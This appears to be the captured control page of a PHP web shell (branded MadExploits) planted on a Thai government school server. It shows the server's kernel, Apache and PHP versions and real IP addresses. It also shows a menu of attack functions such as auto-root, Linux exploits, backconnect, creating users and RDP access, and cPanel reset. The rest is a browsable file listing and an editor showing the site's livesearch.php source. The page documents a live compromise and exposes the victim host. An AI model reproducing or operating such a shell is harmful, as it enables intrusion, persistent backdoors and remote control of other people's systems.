Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
achievement /
main /
[ HOME SHELL ]
Name
Size
Permission
Action
add_score_1.php
9.99
KB
-rwxr-xr-x
add_score_2.php
10.23
KB
-rwxr-xr-x
add_score_3.php
11.14
KB
-rwxr-xr-x
getxml_onet.php
6.86
KB
-rwxr-xr-x
livesearch.php
778
B
-rwxr-xr-x
permission.php
9.65
KB
-rwxr-xr-x
report1.php
9.17
KB
-rwxr-xr-x
report11.php
10.97
KB
-rwxr-xr-x
report1_1.php
8.89
KB
-rwxr-xr-x
report1_1_mobile.php
7.08
KB
-rw-r--r--
report1_2.php
12.3
KB
-rwxr-xr-x
report2.php
6.09
KB
-rwxr-xr-x
report21.php
8.62
KB
-rwxr-xr-x
report2_1.php
6.54
KB
-rwxr-xr-x
report2_2.php
5.26
KB
-rwxr-xr-x
report3.php
6.09
KB
-rwxr-xr-x
report31.php
8.63
KB
-rwxr-xr-x
report3_1.php
6.55
KB
-rwxr-xr-x
report3_2.php
5.26
KB
-rwxr-xr-x
report4.php
9.62
KB
-rwxr-xr-x
report41.php
11.64
KB
-rwxr-xr-x
report4_1.php
10.09
KB
-rw-r--r--
report4_1_mobile.php
8.61
KB
-rw-r--r--
report4_2.php
10.56
KB
-rw-r--r--
report5.php
6.09
KB
-rwxr-xr-x
report51.php
8.62
KB
-rwxr-xr-x
report5_1.php
6.54
KB
-rwxr-xr-x
report5_2.php
5.26
KB
-rwxr-xr-x
report6.php
18.25
KB
-rwxr-xr-x
report61.php
19.65
KB
-rwxr-xr-x
report6_1.php
18.52
KB
-rw-r--r--
report6_1_mobile.php
9.04
KB
-rw-r--r--
report6_2.php
13.14
KB
-rw-r--r--
report7.php
6.09
KB
-rwxr-xr-x
report71.php
8.62
KB
-rwxr-xr-x
report7_1.php
6.54
KB
-rwxr-xr-x
report7_2.php
5.26
KB
-rwxr-xr-x
report_nt.php
9.3
KB
-rw-r--r--
report_nt_group.php
7.84
KB
-rw-r--r--
report_onet.php
10.99
KB
-rw-r--r--
report_onet_group.php
12.21
KB
-rw-r--r--
report_onet_xx.php
7.88
KB
-rw-r--r--
test_import.php
6.71
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : livesearch.php
<?php session_start(); if(!(isset($_SESSION['login_user_id']))){ exit(); } require_once("../../../amssplus_connect.php"); foreach($_GET as $system_key => $system_key_val) { $_GET["$system_key"] =mysqli_real_escape_string($connect,$system_key_val); } $q=$_GET["q"]; $return_file=$_GET["return_file"]; $response=""; $sql = "select school_code,school_name from system_school where school_type='1' and school_name like '%$q%' limit 5"; $dbquery = mysqli_query($connect,$sql); while($result = mysqli_fetch_array($dbquery)){ $school_code = $result['school_code']; $school_name = $result['school_name']; $response=$response."<a href=?option=achievement&task=main/$return_file&school_code=$school_code>$school_name</a>"."<br />"; } echo $response; ?>
Close